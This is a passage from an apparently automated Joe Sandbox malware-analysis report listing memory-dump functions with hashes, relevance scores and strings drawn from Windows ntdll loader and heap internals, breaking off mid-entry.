                                                                            • Instruction Fuzzy Hash: 9661A274600306DFDB29DF68C880B6ABBE1FF45B08F18855DE4568F296D7B0E881CB95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015EC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 016282DE
                                                                            • Failed to reallocate the system dirs string !, xrefs: 016282D7
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 016282E8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-1783798831
                                                                            • Opcode ID: dbc821f232dbd815167a9efc6d20c7474cfc2edf5cf619f9156372109f22c357
                                                                            • Instruction ID: 089e3d7728da1dd593272f0a648ff358bab1479827e01dd2b128f3a2185e5aec
                                                                            • Opcode Fuzzy Hash: dbc821f232dbd815167a9efc6d20c7474cfc2edf5cf619f9156372109f22c357
                                                                            • Instruction Fuzzy Hash: B241F371591312ABC720EFA8DC44B5B7BE8BF95750F45982EF944DB250E770E8108F92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0166C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • PreferredUILanguages, xrefs: 0166C212
                                                                            • @, xrefs: 0166C1F1
                                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0166C1C5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                            • API String ID: 0-2968386058
                                                                            • Opcode ID: 13011c648f4ca62be0a3122552abccc259448c49c6ec0355033248df604cb3ec
                                                                            • Instruction ID: 04290b00240a19114de0fce8e525fb540cad80e470e1416ac0b6636294a1a365
                                                                            • Opcode Fuzzy Hash: 13011c648f4ca62be0a3122552abccc259448c49c6ec0355033248df604cb3ec
                                                                            • Instruction Fuzzy Hash: 55416171E1060AEBDF11DAD8CC51FEEBBBCBB54704F14806AEA49B7240D7749A458B90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01644144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                            • API String ID: 0-1373925480
                                                                            • Opcode ID: 609df1c0cc49ab3ccfed3cde4deb7fd118f8b3ee2e5336d93ac516ee4c6cddd8
                                                                            • Instruction ID: 4ba4b0a09f22c769f3ddb06ed9387e7bd4d052e54714f94478b52de22a35cb47
                                                                            • Opcode Fuzzy Hash: 609df1c0cc49ab3ccfed3cde4deb7fd118f8b3ee2e5336d93ac516ee4c6cddd8
                                                                            • Instruction Fuzzy Hash: C041FF71A00649CBEB26DBE9CC41BAEBBB8FF95340F14445AD901AF791DB359901CB11
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01634755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01634888
                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01634899
                                                                            • LdrpCheckRedirection, xrefs: 0163488F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                            • API String ID: 0-3154609507
                                                                            • Opcode ID: 92d6a46e372e87127b750ae24b306bf4b7a1835c4f68ebad6197f2c6c9110ce6
                                                                            • Instruction ID: 25319917502ef50a96664ddd2afc1d67a1d246b39f80b6b1e7e9e84c69eea331
                                                                            • Opcode Fuzzy Hash: 92d6a46e372e87127b750ae24b306bf4b7a1835c4f68ebad6197f2c6c9110ce6
                                                                            • Instruction Fuzzy Hash: 05419032A146519FCB22CE69DC40A36FBE9FFC9750B06056DED599B351DB30E810CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015C0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 0-2558761708
                                                                            • Opcode ID: eef5e219740088f8f006b4a9184d98f5288bb01972e78dc1c38350369b8fb3f8
                                                                            • Instruction ID: ab0de7de6882a8cbf67da2b1f9ecf7529e943611e2cdc0ecb6249f85f1b04660
                                                                            • Opcode Fuzzy Hash: eef5e219740088f8f006b4a9184d98f5288bb01972e78dc1c38350369b8fb3f8
                                                                            • Instruction Fuzzy Hash: 9211AC35396142DFDB29DE58C840B6AF3A5BB82B1AF18811DF4068F299DB34E881C795
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 016320DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • LdrpInitializationFailure, xrefs: 016320FA
                                                                            • Process initialization failed with status 0x%08lx, xrefs: 016320F3
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01632104
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-2986994758
                                                                            • Opcode ID: 5c2c4169a8d5a98565248cf6de284a0df85d51ee16aa3feee0dad859c6a84dac
                                                                            • Instruction ID: a50fe2ad224487472c71210f23cdf5e9962032389f2318e015f4bdf9c3974e40
                                                                            • Opcode Fuzzy Hash: 5c2c4169a8d5a98565248cf6de284a0df85d51ee16aa3feee0dad859c6a84dac
                                                                            • Instruction Fuzzy Hash: 2CF0C235640319BBEB24E64CCD52FAA7BA8FB80B54F50006DFB007F785D2B0B950CA95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015C03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: #%u
                                                                            • API String ID: 48624451-232158463
                                                                            • Opcode ID: 59507a82331462aa4120cbaec19fa000cd55f4a1fc738d072ef762089897f564
                                                                            • Instruction ID: 984edb3d06bf4bfe218d75cf3b1ba58ba58bcd40a6aed75345923d363d71901e
                                                                            • Opcode Fuzzy Hash: 59507a82331462aa4120cbaec19fa000cd55f4a1fc738d072ef762089897f564
                                                                            • Instruction Fuzzy Hash: 74713972A0014A9FDB05DFA8C990BAEB7F8FF48744F144069E905EB251EB34AD01CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015C52A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$@
                                                                            • API String ID: 0-149943524
                                                                            • Opcode ID: 8023b36f50128197ec1c25c0c141784fb6612b9a2b77c4790310950d72eecaa1
                                                                            • Instruction ID: a9152b71ab53d57171ccd7c70068406944db37b886614aef9e9aa037045876bb
                                                                            • Opcode Fuzzy Hash: 8023b36f50128197ec1c25c0c141784fb6612b9a2b77c4790310950d72eecaa1
                                                                            • Instruction Fuzzy Hash: C2327D746183128FD7248F99C88077EBBE1FF84B44F18491EFA859B290E774E984CB52
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015BA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • LdrResSearchResource Exit, xrefs: 015BAA25
                                                                            • LdrResSearchResource Enter, xrefs: 015BAA13
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                            • API String ID: 0-4066393604
                                                                            • Opcode ID: 9e198bd4d2c71e806e3b05173f58bc9bca67abae1e14ec446c069d2dc5bfc543
                                                                            • Instruction ID: 2c6d7a1fef62aaaf5a3ffd81d6d472a95f08e7f16e1cdeb73d8f0ff4b52bf551
                                                                            • Opcode Fuzzy Hash: 9e198bd4d2c71e806e3b05173f58bc9bca67abae1e14ec446c069d2dc5bfc543
                                                                            • Instruction Fuzzy Hash: C6E15071E00219AFEB22CE9DCD90BEEBBB9BF44310F244529E911EB355E7749941CB60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015B2FC8 Relevance: 2.9, Strings: 2, Instructions: 410COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @4Cw@4Cw$PATH
                                                                            • API String ID: 0-1794901795
                                                                            • Opcode ID: 9aa1725b9d95a8d778d9f3384628f4d2292a248ad2ef32b98c519c836cd3b1c8
                                                                            • Instruction ID: d0eb71188ce6d4e0440a57abc3c2b4d088be517bbacfc69b51a0c83bc05ee009
                                                                            • Opcode Fuzzy Hash: 9aa1725b9d95a8d778d9f3384628f4d2292a248ad2ef32b98c519c836cd3b1c8
                                                                            • Instruction Fuzzy Hash: EFF19C719002199BDB65CF9CDC81AEEBBB5FF88700F998029E941BF350D734A951CB61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0167A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: `$`
                                                                            • API String ID: 0-197956300
                                                                            • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                            • Instruction ID: bbeb9684ebe732bbf4e356c951da336f227b0ed088f8ed12b2439c90bd20e1b4
                                                                            • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                            • Instruction Fuzzy Hash: 8AC1BD312043429BEB24CFA8CC45B6BBBE6AFC4718F084A2DF696CB290D775D545CB81
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015B0CF2 Relevance: 2.8, Strings: 2, Instructions: 317COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • ResIdCount less than 2., xrefs: 0160EEC9
                                                                            • Failed to retrieve service checksum., xrefs: 0160EE56
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                            • API String ID: 0-863616075
                                                                            • Opcode ID: 6782a78aa0a193eb060a0ae101a8a25a9ec959a7cc8e41d5c9e6016c21a5608d
                                                                            • Instruction ID: 0ea680ff5c8b61053a97f181b7af39dbc93e57ed30fec8b42f52a43ad7113a9b
                                                                            • Opcode Fuzzy Hash: 6782a78aa0a193eb060a0ae101a8a25a9ec959a7cc8e41d5c9e6016c21a5608d
                                                                            • Instruction Fuzzy Hash: B0E1D2B19087859FE365CF15C480BAFBBE4FB88314F40892EE5998B380D7719949CF56
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0162E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: Legacy$UEFI
                                                                            • API String ID: 2994545307-634100481
                                                                            • Opcode ID: bcc5af9aea961727d12d647373ebe8c79d9950b07da9371ef381f9f0a88568cd
                                                                            • Instruction ID: 2377b5045c6a7bc94d3dbb2c03f575d4de3b73f4d8c9bdd2f61bf4c0aacb6496
                                                                            • Opcode Fuzzy Hash: bcc5af9aea961727d12d647373ebe8c79d9950b07da9371ef381f9f0a88568cd
                                                                            • Instruction Fuzzy Hash: 1D613B71E00A299FDB14DFA9CC80AAEBBB5FB44700F15407EE649EB291D776A901CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 016543D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$MUI
                                                                            • API String ID: 0-17815947
                                                                            • Opcode ID: 70c890f80a444fc22e73b5ec742e3e79cf75ff0a4b64d1d64b90ca443464a5c0
                                                                            • Instruction ID: 9b9a5dd9fd491f8605965750b17887ec1b97d1fae68f117ab8bb4249a094c384
                                                                            • Opcode Fuzzy Hash: 70c890f80a444fc22e73b5ec742e3e79cf75ff0a4b64d1d64b90ca443464a5c0
                                                                            • Instruction Fuzzy Hash: B7512DB1D4021EAEDB11DFA5CC84AEEBBB8FB44754F104569EA11BB250EB309D45CB60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015B04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • kLsE, xrefs: 015B0540
                                                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 015B063D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                            • API String ID: 0-2547482624
                                                                            • Opcode ID: 1c6ca67274b5106ee4354ae5656ca6f00641d7c7c238024bbe8516a9d5a3a5b5
                                                                            • Instruction ID: d4b22eef7cf64188a3ee36611cf0c7490eef279ac4f64d36e667a021a23a82bf
                                                                            • Opcode Fuzzy Hash: 1c6ca67274b5106ee4354ae5656ca6f00641d7c7c238024bbe8516a9d5a3a5b5
                                                                            • Instruction Fuzzy Hash: 03518D715047428FD724EF68C5806EBBBF4BF84304F14483EE6AA8B681E770E545CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015BA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 015BA2FB
                                                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 015BA309
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                            • API String ID: 0-2876891731
                                                                            • Opcode ID: b8e34631ed8f0e20e272b21cd5ac359df0d316513fed52ecb325a12a4ad6864f
                                                                            • Instruction ID: 7b3f83e596da90602d0ea2fb150b426a031d1f962aab05d9a70580e30e4ef414
                                                                            • Opcode Fuzzy Hash: b8e34631ed8f0e20e272b21cd5ac359df0d316513fed52ecb325a12a4ad6864f
                                                                            • Instruction Fuzzy Hash: 9D418930A0564ADBDB219F69C890BAE7BB4FF84704F2884A9E900DF395E7B5D900CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015EA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: Cleanup Group$Threadpool!
                                                                            • API String ID: 2994545307-4008356553
                                                                            • Opcode ID: 343bb90c7cf862df98fc171561a49631ec2326b294994b2b58f6a7b529d54e2c
                                                                            • Instruction ID: fe8ba23cdb40cd39b23802712379014ae173c5b242be31c3d9fe181bc2ee57dd
                                                                            • Opcode Fuzzy Hash: 343bb90c7cf862df98fc171561a49631ec2326b294994b2b58f6a7b529d54e2c
                                                                            • Instruction Fuzzy Hash: C501DCB2A54700AFD321DF24CE49B2677E8F785B25F058979E659CB190E374E804CB46
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015BC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: MUI
                                                                            • API String ID: 0-1339004836
                                                                            • Opcode ID: a0febd0dc893c2d486bf4573c1bd8003da790bf4bae8870882c4ae4575898506
                                                                            • Instruction ID: 28bd9edd7ca504443ab83711afc8a992d1c0bd1782f9c49dc26fb5f30ae9b11d
                                                                            • Opcode Fuzzy Hash: a0febd0dc893c2d486bf4573c1bd8003da790bf4bae8870882c4ae4575898506
                                                                            • Instruction Fuzzy Hash: D7827975E002198FEB25CFA9C880BEDBBB1BF48314F14816AE919AF351D770AD81CB54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01602F28 Relevance: 2.0, Strings: 1, Instructions: 762COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: P`1wRb1w
                                                                            • API String ID: 0-487437271
                                                                            • Opcode ID: 8ee8af8536bd5b4bf7f2e698d2d87ee0fb29d3ffa2c0022ceb8542a2c475bdbf
                                                                            • Instruction ID: 2e51949601478f3903db3c9205283032d19f52a8180b878eeff2c7390e9e3571
                                                                            • Opcode Fuzzy Hash: 8ee8af8536bd5b4bf7f2e698d2d87ee0fb29d3ffa2c0022ceb8542a2c475bdbf
                                                                            • Instruction Fuzzy Hash: D442CD71D0425AAEEF2FCAACDC446BFBBB1BB09312F14805AE541AB3D1D7718981CB54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0165CD1F Relevance: 1.9, Strings: 1, Instructions: 620COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @
                                                                            • API String ID: 0-2766056989
                                                                            • Opcode ID: a62076708d3ed8f09253c3cd3ba277d89f510b56d554c4357fdc89bf54a91837
                                                                            • Instruction ID: 5f395e1ed60a1f894f94b33e809abcf027da291a0a865ec09fecbf284d3d5133
                                                                            • Opcode Fuzzy Hash: a62076708d3ed8f09253c3cd3ba277d89f510b56d554c4357fdc89bf54a91837
                                                                            • Instruction Fuzzy Hash: DE621870D012188FCB98DF9AC4D4AADB7B2FF8C311F648199E9816BB45C7356A16CF60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015D2E90 Relevance: 1.7, Strings: 1, Instructions: 438COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0
                                                                            • API String ID: 0-4108050209
                                                                            • Opcode ID: 85653585c7fc728ac6d7f619e534ddf94d6d2c7817a9a8f049a37e865a702fa9
                                                                            • Instruction ID: 14d0b5acc36eb8a445ef5941e7b9cc8ab1b754a1918712c2f5c583a529707970
                                                                            • Opcode Fuzzy Hash: 85653585c7fc728ac6d7f619e534ddf94d6d2c7817a9a8f049a37e865a702fa9
                                                                            • Instruction Fuzzy Hash: 48F17BB1608742CFDBB5CF6CC480B6ABBE1BBC8610F08486DE9998B741DB34D945CB52
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0163EFA0 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: __aullrem
                                                                            • String ID:
                                                                            • API String ID: 3758378126-0
                                                                            • Opcode ID: d2399a191eb0f5f701a36fcf9f691f845dfe918fa796f31438aa4cbd81ac600a
                                                                            • Instruction ID: 2d8977f9a3795bbd1a43d94e73164b6f87a01f80dc47320cf512210eb155a7fd
                                                                            • Opcode Fuzzy Hash: d2399a191eb0f5f701a36fcf9f691f845dfe918fa796f31438aa4cbd81ac600a
                                                                            • Instruction Fuzzy Hash: 38418D71F0011A9BDF18DEBDC8905AEF7F2FF88310B188279E615E7280D774A9518790
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01661AA3 Relevance: 1.6, Strings: 1, Instructions: 370COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .
                                                                            • API String ID: 0-248832578
                                                                            • Opcode ID: 70fe3c9444b36dd585b68a111125d2f953815c0cd9f1a6e13c87e072423ced32
                                                                            • Instruction ID: 3c16778ab85eb48f9981285c1f82b9ee7fe0f94042cc4861da6e4ba8a1307386
                                                                            • Opcode Fuzzy Hash: 70fe3c9444b36dd585b68a111125d2f953815c0cd9f1a6e13c87e072423ced32
                                                                            • Instruction Fuzzy Hash: 44E19B75D002698FDF21DFA9C8806BDBBF9FF85700F54811AE885AB295D7749C82CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015C38E0 Relevance: 1.6, Strings: 1, Instructions: 349COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: xTy
                                                                            • API String ID: 0-476160978
                                                                            • Opcode ID: 7f450ed021c2b57976d8073301be545a6544fc09a49f53f1edc0b11ff7169371
                                                                            • Instruction ID: 8b13ec3fbf357cb22ec094d6496f18434ae3a9d15b749e8194c9e0dc1dfe1a4a
                                                                            • Opcode Fuzzy Hash: 7f450ed021c2b57976d8073301be545a6544fc09a49f53f1edc0b11ff7169371
                                                                            • Instruction Fuzzy Hash: FDE18D75A002098FDB18CF99C890AAEBBF1FF48314F18815DE956EB395D770EA41CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015B0100 Relevance: 1.6, Strings: 1, Instructions: 321COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID: 0-3916222277
                                                                            • Opcode ID: dd91778c510ea9ef75e38b30989a70c4479733a72693bd25aa7468f8e5b26312
                                                                            • Instruction ID: 0c920f7914c99991230b24ece5ca336aa74c74694fcd804574fb2623074f8d55
                                                                            • Opcode Fuzzy Hash: dd91778c510ea9ef75e38b30989a70c4479733a72693bd25aa7468f8e5b26312
                                                                            • Instruction Fuzzy Hash: 69A12A31A042296ADF2A8A28CDC5BFF6BF5BB95304F044899FE465F2C1D77589848B50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01664420 Relevance: 1.6, Strings: 1, Instructions: 307COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
